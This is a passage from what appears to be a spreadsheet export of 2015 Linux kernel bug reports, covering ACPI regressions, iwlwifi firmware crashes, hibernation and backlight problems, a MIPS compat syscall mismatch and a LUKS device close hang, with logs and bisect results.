    <t>Created attachment 174841 [details] full dmesg of broken ACPI after booting into 73f7d1c with applied c4e1acbb We are running Linux on a lot of TYAN S8812 mainboards for some years now. It always worked great. After upgrading the kernel to 3.14.x some days ago our KVM keyboards stopped working. The reason seems to be that ACPI is not enabled anymore: [ 0.000552] ACPI: Core revision 20131115 [ 0.007292] ACPI: All ACPI Tables successfully acquired [ 0.049357] ACPI Error: Hardware did not enter ACPI mode (20131115/evxfevnt-113) [ 0.049710] ACPI Warning: AcpiEnable failed (20131115/utxfinit-161) [ 0.049977] ACPI: Unable to enable ACPI This issue maybe related to: Bug 74551 as in both cases ACPI can not be enabled - but since 3.13.x is in the list of broken kernels for bug 74551 and works for us i opened this new bug. git bisect found 73f7d1ca32638028e3271f54616773727e2f9f26 to be the first bad commit for our issue. some issues introduced with this commit were fixed in commit c4e1acbb35e4a3838cdfc0e7f8237e844aff00b6 apparently this does not fix our issue (even if applied directly onto 73f7d1ca3263) (see attached dmesg). it seems that acpi_early_init() is called to early for the tyan S8812 mainboard, while it is working fine on other mainboards we are running. - BIOS version is 1.08 (latest, 2013/07/09) - BIOS settings have been reset to defaults - still same issue. what information can i provide to help to fix this issue?</t>
  </si>
  <si>
    <t>iwlwifi: mvm: can't retry to associate if the AP sent deauth between auth and assoc - MWG100237204</t>
  </si>
  <si>
    <t>4.0.0</t>
  </si>
  <si>
    <t>2015-04-23 22:16 UTC</t>
  </si>
  <si>
    <t>ailin.nemui+kernel</t>
  </si>
  <si>
    <t>2016-05-30 16:38 UTC</t>
  </si>
  <si>
    <t>Created attachment 174941 [details] journalctl output when trying to connect with -12 firmware Since I installed the newest firmware I am unable to connect to the wireless network. For now I can only show you some output from journalctl, I will try to help if you tell me what to do but I'm more a regular user than kernel developer. Using my distribution provided kernel compiles (openSUSE 4.0.0-2.g53b125b-desktop) Going back to -9 makes the network connect again. I also attached that journalctl output in the noproblem log file.</t>
  </si>
  <si>
    <t>linux 3.19.5 - lenovo x220 hibernation regression</t>
  </si>
  <si>
    <t>3.19.5</t>
  </si>
  <si>
    <t>2015-04-24 17:58 UTC</t>
  </si>
  <si>
    <t>Thomas Mann</t>
  </si>
  <si>
    <t>2015-05-10 11:30 UTC</t>
  </si>
  <si>
    <t>3.19.4 fixed some hibernation problem with my x220 lenovo laptop and allowed my laptop to enter hibernation without a problem. i think the i915 card was causing the problems before 3.19.4 and prior to this release it was only possible to get into hibernation in ~3 out of 4 cases. Compared to 3.19.4, 3.19.5 introduced a new regression that allows to enter the hibernation state nearly never and the pc hangs at the snapshot phase.</t>
  </si>
  <si>
    <t>Delay in backlight adjusting</t>
  </si>
  <si>
    <t>4.0+</t>
  </si>
  <si>
    <t>2015-04-27 18:10 UTC</t>
  </si>
  <si>
    <t>Tigran Gabrielyan</t>
  </si>
  <si>
    <t>2015-07-07 02:55 UTC</t>
  </si>
  <si>
    <t>Created attachment 175151 [details] dmesg Laptop: Lenovo Z50 Affected Kernels: 4.0+ Starting from kernel 4.0, pressing Fn+F11/F12 to adjust backlight has a long delay (2+ seconds). Last working kernel is 3.19.3. I have tried 4.1rc1 which is not fixed.</t>
  </si>
  <si>
    <t>r8712 generate crash message([cut here] stuff) in dmesg since 4.1RC1</t>
  </si>
  <si>
    <t>4.1RC1</t>
  </si>
  <si>
    <t>2015-05-04 19:13 UTC</t>
  </si>
  <si>
    <t>Arek Ruśniak</t>
  </si>
  <si>
    <t>2015-06-09 16:09 UTC</t>
  </si>
  <si>
    <t>Created attachment 175831 [details] dmesg for linux 4.1rc2 with r8712u problem. result of bisecting: 6501c8e7d86cca5fab74f873810cbc573273d1b4 is the first bad commit commit 6501c8e7d86cca5fab74f873810cbc573273d1b4 Author: Vaishali Thakkar &lt;vthakkar1994@gmail.com&gt; Date: Fri Mar 6 16:23:35 2015 +0530 Staging: rtl8712: Eliminate use of _cancel_timer_ex Use timer API function del_timer_sync instead of driver specific function _cancel_timer_ex as besides deactivating a timer, it ensures that the timer is stopped on all CPUs before the driver exists. Also, definition of function _cancel_timer_ex is removed as it is no longer needed after this change. This is done using Coccinelle and semantic patch used for this is as follows: @@ expression x; @@ - _cancel_timer_ex (&amp;x); + del_timer_sync (&amp;x); Signed-off-by: Vaishali Thakkar &lt;vthakkar1994@gmail.com&gt; Signed-off-by: Greg Kroah-Hartman &lt;gregkh@linuxfoundation.org&gt; :040000 040000 eaab34b0be7461ea124eb924a374babf19bb05f9 32fe24820b768fdebf160e003e57a4d2b9cf3505 M drivers Everything works really good as before, no wifi networking problem etc.</t>
  </si>
  <si>
    <t>iwlwifi: 7260: 1080p Rx is stuck with Bluetooth A2DP source (high ping latency) - MWG100235369</t>
  </si>
  <si>
    <t>2015-05-08 12:41 UTC</t>
  </si>
  <si>
    <t>sheksis</t>
  </si>
  <si>
    <t>2015-10-14 17:44 UTC</t>
  </si>
  <si>
    <t>Intel Linux Wireless</t>
  </si>
  <si>
    <t>Heres my setup 1. Intel 7260AC card 2. Intel Bluetooth 3. Fedora 21 $ uname -r 3.19.5-200.fc21.x86_64 This is a follow up from bug97291 The ping latency increases all of a sudden on switching on a bluetooth speaker. Excerpts from the bug: ---8X--- I made a discovery. I listen to music through a bluetooth speaker. So the speaker is invariably on when I run a youtube video. Today it was off... and the moment I turned it on, see the jump in latency... 64 bytes from 192.168.1.1: icmp_seq=2729 ttl=254 time=1.75 ms 64 bytes from 192.168.1.1: icmp_seq=2730 ttl=254 time=3.98 ms 64 bytes from 192.168.1.1: icmp_seq=2731 ttl=254 time=5.22 ms 64 bytes from 192.168.1.1: icmp_seq=2732 ttl=254 time=1.74 ms 64 bytes from 192.168.1.1: icmp_seq=2733 ttl=254 time=443 ms 64 bytes from 192.168.1.1: icmp_seq=2734 ttl=254 time=157 ms 64 bytes from 192.168.1.1: icmp_seq=2735 ttl=254 time=2163 ms 64 bytes from 192.168.1.1: icmp_seq=2736 ttl=254 time=2463 ms 64 bytes from 192.168.1.1: icmp_seq=2737 ttl=254 time=2198 ms 64 bytes from 192.168.1.1: icmp_seq=2738 ttl=254 time=1228 ms 64 bytes from 192.168.1.1: icmp_seq=2739 ttl=254 time=1008 ms 64 bytes from 192.168.1.1: icmp_seq=2740 ttl=254 time=187 ms Now with this latency, the video was about to get stuck when I immediately switched it off. The latency took some time to recover but when it did, it did not climb back again 64 bytes from 192.168.1.1: icmp_seq=2802 ttl=254 time=3154 ms 64 bytes from 192.168.1.1: icmp_seq=2803 ttl=254 time=2950 ms 64 bytes from 192.168.1.1: icmp_seq=2804 ttl=254 time=2908 ms 64 bytes from 192.168.1.1: icmp_seq=2805 ttl=254 time=2287 ms 64 bytes from 192.168.1.1: icmp_seq=2806 ttl=254 time=1335 ms 64 bytes from 192.168.1.1: icmp_seq=2807 ttl=254 time=475 ms 64 bytes from 192.168.1.1: icmp_seq=2808 ttl=254 time=11.4 ms 64 bytes from 192.168.1.1: icmp_seq=2809 ttl=254 time=2.19 ms 64 bytes from 192.168.1.1: icmp_seq=2810 ttl=254 time=3.35 ms 64 bytes from 192.168.1.1: icmp_seq=2811 ttl=254 time=1.71 ms 64 bytes from 192.168.1.1: icmp_seq=2812 ttl=254 time=3.62 ms 64 bytes from 192.168.1.1: icmp_seq=2813 ttl=254 time=1.21 ms I again switched on the speaker and the latency jumped yet again 64 bytes from 192.168.1.1: icmp_seq=2980 ttl=254 time=5.37 ms 64 bytes from 192.168.1.1: icmp_seq=2981 ttl=254 time=1.06 ms 64 bytes from 192.168.1.1: icmp_seq=2982 ttl=254 time=5.96 ms 64 bytes from 192.168.1.1: icmp_seq=2983 ttl=254 time=1.45 ms 64 bytes from 192.168.1.1: icmp_seq=2984 ttl=254 time=39.4 ms 64 bytes from 192.168.1.1: icmp_seq=2985 ttl=254 time=906 ms 64 bytes from 192.168.1.1: icmp_seq=2986 ttl=254 time=869 ms 64 bytes from 192.168.1.1: icmp_seq=2987 ttl=254 time=1271 ms 64 bytes from 192.168.1.1: icmp_seq=2988 ttl=254 time=1554 ms I repeated the process many times with repeatable results. ---X8---</t>
  </si>
  <si>
    <t>iwlwifi: 7260: failed to enable LP XTAL upon resume with RFKILL - MWG100236201</t>
  </si>
  <si>
    <t>4.0.3</t>
  </si>
  <si>
    <t>2015-05-18 15:12 UTC</t>
  </si>
  <si>
    <t>Jonas Platte</t>
  </si>
  <si>
    <t>2015-10-05 15:08 UTC</t>
  </si>
  <si>
    <t>Created attachment 177221 [details] lspci output for the wireless card The iwlwifi kernel module crashes reproducibly whenever I suspend to ram and then resume the system again. My wireless card is an Intel AC 7260 that has both Wlan and Bluetooth, I also attached the lspci output for further details (intel-ac7260.txt). I'm on arch linux, with kernel version 4.0.3, and I have the latest wifi microcode for my hardware + kernel version (/usr/lib/firmware/iwlwifi-7260-12.ucode).</t>
  </si>
  <si>
    <t>iwlwifi: 7260: TFD queue hang</t>
  </si>
  <si>
    <t>4.1.0-rc4-21-desktop+</t>
  </si>
  <si>
    <t>2015-05-23 14:33 UTC</t>
  </si>
  <si>
    <t>donothingloop</t>
  </si>
  <si>
    <t>2015-05-31 12:33 UTC</t>
  </si>
  <si>
    <t>Hi, I upgraded my kernel from "4.0.0-rc1-21-desktop+" to "4.1.0-rc4-21-desktop+" without any changes to my .config. My wlan card seems to be unstable and I also cannot connect to WPA-Enterprise networks (which is more likely an incompatibility of my wpa_supplicant version). In the kernel log every 20 seconds or so this message appears: [ 68.025207] iwlwifi 0000:04:00.0: L1 Enabled - LTR Enabled [ 68.025446] iwlwifi 0000:04:00.0: L1 Enabled - LTR Enabled [ 68.233715] iwlwifi 0000:04:00.0: L1 Enabled - LTR Enabled [ 68.233965] iwlwifi 0000:04:00.0: L1 Enabled - LTR Enabled [ 96.283795] iwlwifi 0000:04:00.0: Queue 2 stuck for 10000 ms. [ 96.283812] iwlwifi 0000:04:00.0: Current SW read_ptr 80 write_ptr 140 [ 96.283845] iwl data: 00000000: 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 ................ [ 96.283869] iwlwifi 0000:04:00.0: FH TRBs(0) = 0x00000000 [ 96.283893] iwlwifi 0000:04:00.0: FH TRBs(1) = 0x8010205f [ 96.283915] iwlwifi 0000:04:00.0: FH TRBs(2) = 0x00000000 [ 96.283936] iwlwifi 0000:04:00.0: FH TRBs(3) = 0x80300003 [ 96.283956] iwlwifi 0000:04:00.0: FH TRBs(4) = 0x00000000 [ 96.283978] iwlwifi 0000:04:00.0: FH TRBs(5) = 0x00000000 [ 96.283999] iwlwifi 0000:04:00.0: FH TRBs(6) = 0x00000000 [ 96.284020] iwlwifi 0000:04:00.0: FH TRBs(7) = 0x00709051 [ 96.284079] iwlwifi 0000:04:00.0: Q 0 is active and mapped to fifo 3 ra_tid 0x0000 [4,4] [ 96.284136] iwlwifi 0000:04:00.0: Q 1 is active and mapped to fifo 2 ra_tid 0x0000 [0,0] [ 96.284187] iwlwifi 0000:04:00.0: Q 2 is active and mapped to fifo 1 ra_tid 0x0000 [80,140] [ 96.284237] iwlwifi 0000:04:00.0: Q 3 is active and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 96.284287] iwlwifi 0000:04:00.0: Q 4 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 96.284338] iwlwifi 0000:04:00.0: Q 5 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 96.284396] iwlwifi 0000:04:00.0: Q 6 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 96.284446] iwlwifi 0000:04:00.0: Q 7 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 96.284497] iwlwifi 0000:04:00.0: Q 8 is active and mapped to fifo 3 ra_tid 0x0000 [0,0] [ 96.284556] iwlwifi 0000:04:00.0: Q 9 is active and mapped to fifo 7 ra_tid 0x0000 [82,82] [ 96.284607] iwlwifi 0000:04:00.0: Q 10 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 96.284657] iwlwifi 0000:04:00.0: Q 11 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 96.284707] iwlwifi 0000:04:00.0: Q 12 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 96.284757] iwlwifi 0000:04:00.0: Q 13 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 96.284808] iwlwifi 0000:04:00.0: Q 14 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 96.284858] iwlwifi 0000:04:00.0: Q 15 is active and mapped to fifo 5 ra_tid 0x0000 [0,0] [ 96.284908] iwlwifi 0000:04:00.0: Q 16 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 96.284959] iwlwifi 0000:04:00.0: Q 17 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 96.285009] iwlwifi 0000:04:00.0: Q 18 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 96.285059] iwlwifi 0000:04:00.0: Q 19 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 96.285110] iwlwifi 0000:04:00.0: Microcode SW error detected. Restarting 0x2000000. [ 96.285113] iwlwifi 0000:04:00.0: CSR values: [ 96.285114] iwlwifi 0000:04:00.0: (2nd byte of CSR_INT_COALESCING is CSR_INT_PERIODIC_REG) [ 96.285119] iwlwifi 0000:04:00.0: CSR_HW_IF_CONFIG_REG: 0X40489204 [ 96.285133] iwlwifi 0000:04:00.0: CSR_INT_COALESCING: 0X8000ff40 [ 96.285144] iwlwifi 0000:04:00.0: CSR_INT: 0X00000000 [ 96.285157] iwlwifi 0000:04:00.0: CSR_INT_MASK: 0X00000000 [ 96.285178] iwlwifi 0000:04:00.0: CSR_FH_INT_STATUS: 0X00000000 [ 96.285190] iwlwifi 0000:04:00.0: CSR_GPIO_IN: 0X00000000 [ 96.285194] iwlwifi 0000:04:00.0: CSR_RESET: 0X00000000 [ 96.285204] iwlwifi 0000:04:00.0: CSR_GP_CNTRL: 0X080403c5 [ 96.285215] iwlwifi 0000:04:00.0: CSR_HW_REV: 0X00000144 [ 96.285225] iwlwifi 0000:04:00.0: CSR_EEPROM_REG: 0X00000000 [ 96.285235] iwlwifi 0000:04:00.0: CSR_EEPROM_GP: 0X80000000 [ 96.285245] iwlwifi 0000:04:00.0: CSR_OTP_GP_REG: 0X803a0000 [ 96.285255] iwlwifi 0000:04:00.0: CSR_GIO_REG: 0X00080040 [ 96.285266] iwlwifi 0000:04:00.0: CSR_GP_UCODE_REG: 0X00000000 [ 96.285276] iwlwifi 0000:04:00.0: CSR_GP_DRIVER_REG: 0X00000000 [ 96.285286] iwlwifi 0000:04:00.0: CSR_UCODE_DRV_GP1: 0X00000000 [ 96.285297] iwlwifi 0000:04:00.0: CSR_UCODE_DRV_GP2: 0X00000000 [ 96.285307] iwlwifi 0000:04:00.0: CSR_LED_REG: 0X00000060 [ 96.285317] iwlwifi 0000:04:00.0: CSR_DRAM_INT_TBL_REG: 0X88214f8e [ 96.285327] iwlwifi 0000:04:00.0: CSR_GIO_CHICKEN_BITS: 0X27800200 [ 96.285338] iwlwifi 0000:04:00.0: CSR_ANA_PLL_CFG: 0Xd55555d5 [ 96.285348] iwlwifi 0000:04:00.0: CSR_MONITOR_STATUS_REG: 0X3d0801bd [ 96.285358] iwlwifi 0000:04:00.0: CSR_HW_REV_WA_REG: 0X0001001a [ 96.285368] iwlwifi 0000:04:00.0: CSR_DBG_HPET_MEM_REG: 0Xffff0000 [ 96.285369] iwlwifi 0000:04:00.0: FH register values: [ 96.285390] iwlwifi 0000:04:00.0: FH_RSCSR_CHNL0_STTS_WPTR_REG: 0X0c5c2c00 [ 96.285401] iwlwifi 0000:04:00.0: FH_RSCSR_CHNL0_RBDCB_BASE_REG: 0X00c5c2b0 [ 96.285412] iwlwifi 0000:04:00.0: FH_RSCSR_CHNL0_WPTR: 0X000000e8 [ 96.285424] iwlwifi 0000:04:00.0: FH_MEM_RCSR_CHNL0_CONFIG_REG: 0X00801114 [ 96.285435] iwlwifi 0000:04:00.0: FH_MEM_RSSR_SHARED_CTRL_REG: 0X000000fc [ 96.285447] iwlwifi 0000:04:00.0: FH_MEM_RSSR_RX_STATUS_REG: 0X03030000 [ 96.285458] iwlwifi 0000:04:00.0: FH_MEM_RSSR_RX_ENABLE_ERR_IRQ2DRV: 0X00000000 [ 96.285470] iwlwifi 0000:04:00.0: FH_TSSR_TX_STATUS_REG: 0X07ff0001 [ 96.285481] iwlwifi 0000:04:00.0: FH_TSSR_TX_ERROR_REG: 0X00000000 [ 96.285585] iwlwifi 0000:04:00.0: Start IWL Error Log Dump: [ 96.285587] iwlwifi 0000:04:00.0: Status: 0x00000000, count: 6 [ 96.285588] iwlwifi 0000:04:00.0: Loaded firmware version: 25.24.13.0 [ 96.285590] iwlwifi 0000:04:00.0: 0x00000084 | NMI_INTERRUPT_UNKNOWN [ 96.285591] iwlwifi 0000:04:00.0: 0x00000624 | uPc [ 96.285592] iwlwifi 0000:04:00.0: 0x00000000 | branchlink1 [ 96.285593] iwlwifi 0000:04:00.0: 0x00000B2E | branchlink2 [ 96.285595] iwlwifi 0000:04:00.0: 0x00016210 | interruptlink1 [ 96.285596] iwlwifi 0000:04:00.0: 0x000001D8 | interruptlink2 [ 96.285597] iwlwifi 0000:04:00.0: 0x00000000 | data1 [ 96.285598] iwlwifi 0000:04:00.0: 0x00000080 | data2 [ 96.285599] iwlwifi 0000:04:00.0: 0x07030000 | data3 [ 96.285600] iwlwifi 0000:04:00.0: 0xFFC1CCEE | beacon time [ 96.285602] iwlwifi 0000:04:00.0: 0x6B3DAD12 | tsf low [ 96.285603] iwlwifi 0000:04:00.0: 0x000001AC | tsf hi [ 96.285604] iwlwifi 0000:04:00.0: 0x00000000 | time gp1 [ 96.285605] iwlwifi 0000:04:00.0: 0x01AB8DC7 | time gp2 [ 96.285606] iwlwifi 0000:04:00.0: 0x00000000 | time gp3 [ 96.285607] iwlwifi 0000:04:00.0: 0x00041918 | uCode version [ 96.285608] iwlwifi 0000:04:00.0: 0x00000144 | hw version [ 96.285610] iwlwifi 0000:04:00.0: 0x40489204 | board version [ 96.285611] iwlwifi 0000:04:00.0: 0x0000001C | hcmd [ 96.285612] iwlwifi 0000:04:00.0: 0xA6D23042 | isr0 [ 96.285613] iwlwifi 0000:04:00.0: 0x01018000 | isr1 [ 96.285614] iwlwifi 0000:04:00.0: 0x0000000A | isr2 [ 96.285615] iwlwifi 0000:04:00.0: 0x404220C6 | isr3 [ 96.285616] iwlwifi 0000:04:00.0: 0x00000000 | isr4 [ 96.285617] iwlwifi 0000:04:00.0: 0x00800110 | isr_pref [ 96.285620] iwlwifi 0000:04:00.0: 0x00000000 | wait_event [ 96.285621] iwlwifi 0000:04:00.0: 0x000000D4 | l2p_control [ 96.285622] iwlwifi 0000:04:00.0: 0x0001A030 | l2p_duration [ 96.285623] iwlwifi 0000:04:00.0: 0x00000007 | l2p_mhvalid [ 96.285624] iwlwifi 0000:04:00.0: 0x00000081 | l2p_addr_match [ 96.285625] iwlwifi 0000:04:00.0: 0x00000005 | lmpm_pmg_sel [ 96.285626] iwlwifi 0000:04:00.0: 0x09051509 | timestamp [ 96.285628] iwlwifi 0000:04:00.0: 0x0034E0F0 | flow_handler [ 96.285633] ieee80211 phy0: Hardware restart was requested [ 96.285644] ------------[ cut here ]------------</t>
  </si>
  <si>
    <t>Wireless power level always the same.</t>
  </si>
  <si>
    <t>4.0.4</t>
  </si>
  <si>
    <t>2015-06-09 06:35 UTC</t>
  </si>
  <si>
    <t>2015-06-09 19:32 UTC</t>
  </si>
  <si>
    <t>Created attachment 179211 [details] System info. The power level of the WEXT driver always reports the same value. The power level is picked at start up of the system and stays always the same. Every program that uses /proc/net/wireless displays the same power level, as the file doesn't get updated. Relative thread: https://bbs.archlinux.org/viewtopic.php?pid=1535624 cat /proc/net/wireless Notice the level number. Move away from the connected access point. "cat" again and notice the power level again.</t>
  </si>
  <si>
    <t>Regression 3.10.80 vs. 3.10.79: ACPI change creates resource conflict with ahci</t>
  </si>
  <si>
    <t>3.10.80</t>
  </si>
  <si>
    <t>2015-06-11 19:01 UTC</t>
  </si>
  <si>
    <t>2015-07-14 19:01 UTC</t>
  </si>
  <si>
    <t>Created attachment 179671 [details] acpidump from affected system Hi, I recently updated from 3.10.79 to 3.10.80, and my system wouldn't boot any more. I tracked this down to commit 92c934b10ec3 ("ACPI / init: Fix the ordering of acpi_reserve_resources()"). With that commit reverted, my system is OK again. What happens is that ahci fails to initialize because pcim_iomap_regions_request_all() fails with EBUSY, due to a resource conflict on the first IO region of the ahci device. Since my root device is on ahci, that's the end of that. I'm sure this is due to a BIOS / ACPI table bug on my particular platform, but that's scant comfort when the system won't boot :) I patched 3.10.80 so that ahci continues to initialize after the EBUSY, and relevant parts of the kernel log seem to be: [ 3.836643,26] system 00:06: [io 0x0400-0x047f] could not be reserved ... [ 3.844112,26] pci 0000:00:1f.2: BAR 0: assigned [io 0x0410-0x0417] ... [ 6.020040,00] ahci 0000:00:1f.2: BAR 0: can't reserve [io 0x0410-0x0417] and /proc/ioports shows 0410-0415 : ACPI CPU throttle So if I'm understanding properly, for some reason we discover but fail to reserve the region with the ACPI resources, then PCI decides to assign ahci IO ports into that range, then ACPI loads and reserves 0x0410-0x0415, and then ahci fails to load. If I fully revert the patch, then I see [ 3.853857,08] system 00:06: [io 0x0400-0x047f] has been reserved ... [ 3.861806,08] pci 0000:00:1f.2: BAR 0: assigned [io 0x0820-0x0827] We're able to reserve the range, and then PCI assigns ahci into a non-conflicting range. From the link order, drivers/acpi init wll be called before drivers/pnp init, right? In my case, the acpi resources ("ACPI PM1a_EVT_BLK") etc are under a pnp bus. But if acpi requests the resources first, then pnp can't request the enclosing range. Attaching acpidump from the system in question.</t>
  </si>
  <si>
    <t>sys_getsockopt -&gt; compat_sys_getsockopt for O32 subsystem</t>
  </si>
  <si>
    <t>3.7.10</t>
  </si>
  <si>
    <t>2015-06-22 04:43 UTC</t>
  </si>
  <si>
    <t>Alexey</t>
  </si>
  <si>
    <t>2015-07-09 17:35 UTC</t>
  </si>
  <si>
    <t>Hello. There is a wrong system call used for compatibility between native kernel and O32 userspace: /arch/mips/kernel/scall64-o32.S PTR sys_getsockopt but: PTR compat_sys_setsockopt This false symmetry in system calls leads to erroneous behavior when any data structure (which differs in size for 32-bit and 64-bit subsystems) is passed from O32 into kernel via setsockopt(), got back via getsockopt() and finally sent again via setsockopt(). First compat_sys_setsockopt will bloat it correctly for kernel space usage, then sys_getsockopt will send it to userspace without backward conversion, and even if userspace does nothing with this data, second compat_sys_setsockopt will bloat it again. One of the easier ways to reproduce the consequences of the bug is to use iptables compiled for O32 with ULOG target. We will get the error on the second try: First call &gt;iptables -I INPUT -j ULOG (OK) Second call &gt;iptables -I INPUT -j ULOG x_tables: ip_tables: ULOG.0 target: invalid size 56 (kernel) != (user) 64 The second call does not matter a bit here, as it is the first rule that gets bloated twice in kernel, so we'll get the error as long as the first ULOG rule succeeds. Also, there was a patch fixing this bug, but only concerning N32: https://patchwork.linux-mips.org/patch/7115/ To fix the bug, it is needed to reapply the patch above for O32 (scall64-o32.S) - PTR sys_getsockopt + PTR compat_sys_getsockopt</t>
  </si>
  <si>
    <t>Huge delay when pressing Fn keys and (un)plugging power on a Lenovo U530 Laptop</t>
  </si>
  <si>
    <t>v4.0+</t>
  </si>
  <si>
    <t>2015-06-24 07:06 UTC</t>
  </si>
  <si>
    <t>marcus.behrendt.86</t>
  </si>
  <si>
    <t>2015-07-06 04:40 UTC</t>
  </si>
  <si>
    <t>Created attachment 180741 [details] dmesg with first bad commit I reported this bug several weeks ago, but I think in the wrong section and without much information. https://bugzilla.kernel.org/show_bug.cgi?id=99291 The problem is that since linux 4.0 the recognition of the power supply state has a huge delay (seconds up to minutes) on a Lenovo U530 Laptop. cat /sys/class/power_supply/BAT1/status hangs and won't print any output after I plug or unplug the power. Also some Fn keys are hit by this delay (Brightness and Monitor off). This issue was not present before. Nevertheless I bisected the issue to commit 74443bbed72ab22ee005ecb6ecdc657a8018e1db Author: Lv Zheng &lt;lv.zheng@intel.com&gt; Date: Wed Jan 14 19:28:47 2015 +0800 I also tried to boot with a lot of combinations of "acpi_osi", but nothing helped. So linux is almost not usable for me since version 4.0.</t>
  </si>
  <si>
    <t>Intel framebuffer causes screen to rapidly move from right to left, and up and around.</t>
  </si>
  <si>
    <t>4.1 4.0</t>
  </si>
  <si>
    <t>2015-06-26 13:33 UTC</t>
  </si>
  <si>
    <t>Jeff Z</t>
  </si>
  <si>
    <t>2015-10-20 12:39 UTC</t>
  </si>
  <si>
    <t>Created attachment 180971 [details] My kernel config ~ # lspci | grep VGA 00:02.0 VGA compatible controller: Intel Corporation Broadwell-U Integrated Graphics (rev 09) ============================================== Kernel config (4.1): Device Drivers ---&gt; Graphics Support ---&gt; &lt; &gt; /dev/agpgart (AGP Support) --- [*] VGA Arbitration Direct Rendering Manager ---&gt; &lt;*&gt; Direct Rendering Manager (Xfree...) ---&gt; &lt;*&gt; Intel 8xx/9xx/G3x/G4x/HD Graphics [*] Enable modesetting on intel by default [*] Enable legacy fbdev support for modesetting intel driver # I also have my kernel .config attached =============================================== So I found out that you can use the Intel framebuffer instead of EFI framebuffer for EFI booting. But it causes the framebuffer to rapidly move the screen from right to left. Its also slowly moving up as well. The behavior of this is a bit weird: - The first time its in framebuffer (boot up time) is ok. - The first time its in Xorg is ok. - But when I leave Xorg and into the command line again, it happens - If I try to go back into Xorg again, it happens. Unless I use a wallpaper using 'feh' This is on the new Intel Broadwell i7-5500 with HD Graphics 5500. Here is a video on it: https://youtu.be/NODaj7CsMdE The first time was with no wallpaper, The second time was with a wallpaper. I can try to provide more information if you need me to.</t>
  </si>
  <si>
    <t>Boot hangs after "Booting the kernel." message on eCAFE EC-800-H20G/S netbook since commit b9a5e5e18fbf223502c0b2264c15024e393da928.</t>
  </si>
  <si>
    <t>4.0.5+</t>
  </si>
  <si>
    <t>2015-06-27 14:39 UTC</t>
  </si>
  <si>
    <t>g5983969</t>
  </si>
  <si>
    <t>Created attachment 181071 [details] Messages with debug enabled. Boot hangs with linux kernel 4.0.5+ after "Booting the kernel." message on the eCAFE EC-800-H20G/S netbook. With "debug" appended to the kernel line the last message displayed is "random: nonblocking pool is initialized". Booting with "acpi=off" allows the netbook to boot (but with limited functionality of course). Reverting commit b9a5e5e18fbf223502c0b2264c15024e393da928 "ACPI / init: Fix the ordering of acpi_reserve_resources()" solves the problem. I have attached a photo of the netbook's screen showing more of the messages with "debug" enabled. Please ask for more information if necessary. Thanks in advance.</t>
  </si>
  <si>
    <t>writeback changes merged in 4.2 cause closing of luks crypt devices to hang</t>
  </si>
  <si>
    <t>4.2.0-9-generic #201506290030 SMP Mon Jun 29 00:33:15 CDT 2015 x86_64 x86_64 x86_64 GNU/Linux</t>
  </si>
  <si>
    <t>2015-06-29 15:56 UTC</t>
  </si>
  <si>
    <t>Jon Christopherson</t>
  </si>
  <si>
    <t>2015-11-10 02:50 UTC</t>
  </si>
  <si>
    <t>After the recent DM changes My luks crypt devices hang on closing. I am running the latest mainline kernel as of 6/29/2015 compiled from a cloned git repo. If I revert to 4.1.0 the devices close correctly. This command triggers the bug: enigma jon # /opt/cryptsetup/sbin/cryptsetup --debug luksClose data # cryptsetup 1.7.0-git processing "/opt/cryptsetup/sbin/cryptsetup --debug luksClose data" # Running command close. # Locking memory. # Installing SIGINT/SIGTERM handler. # Unblocking interruption on signal. # Allocating crypt device context by device data. # Initialising device-mapper backend library. # dm version OF [16384] (*1) # dm versions OF [16384] (*1) # Detected dm-crypt version 1.14.0, dm-ioctl version 4.32.0. # Device-mapper backend running with UDEV support enabled. # dm status data OF [16384] (*1) # Releasing device-mapper backend. # Trying to open and read device /dev/sdc2 with direct-io. # Allocating crypt device /dev/sdc2 context. # Trying to open and read device /dev/sdc2 with direct-io. # Initialising device-mapper backend library. # dm table data OFW [16384] (*1) # Trying to open and read device /dev/sdc2 with direct-io. # Crypto backend (gcrypt 1.5.3, flawed whirlpool) initialized. # Detected kernel Linux 4.2.0-9-generic x86_64. # Reading LUKS header of size 1024 from device /dev/sdc2 # Key length 64, device size 3873472512 sectors, header size 4036 sectors. # Deactivating volume data. # dm status data OF [16384] (*1) # Udev cookie 0xd4d5533 (semid 720896) created # Udev cookie 0xd4d5533 (semid 720896) incremented to 1 # Udev cookie 0xd4d5533 (semid 720896) incremented to 2 # Udev cookie 0xd4d5533 (semid 720896) assigned to REMOVE task(2) with flags (0x0) # dm remove data OFT [16384] (*1) It seems to remove/close/relock the device, but never returns. I do not see any kernel panics, the task will just sit there forever causing shutdown/restarts to fail since most scripts try and close the devices on reboot/shutdown.</t>
  </si>
  <si>
    <t>Touchpad no longer detected on XPS 13 (9343)</t>
  </si>
  <si>
    <t>4.2-rc2</t>
  </si>
  <si>
    <t>2015-07-14 06:48 UTC</t>
  </si>
  <si>
    <t>Christoph</t>
  </si>
  <si>
    <t>2016-01-20 23:45 UTC</t>
  </si>
  <si>
    <t>Drivers/I2C virtual user</t>
  </si>
  <si>
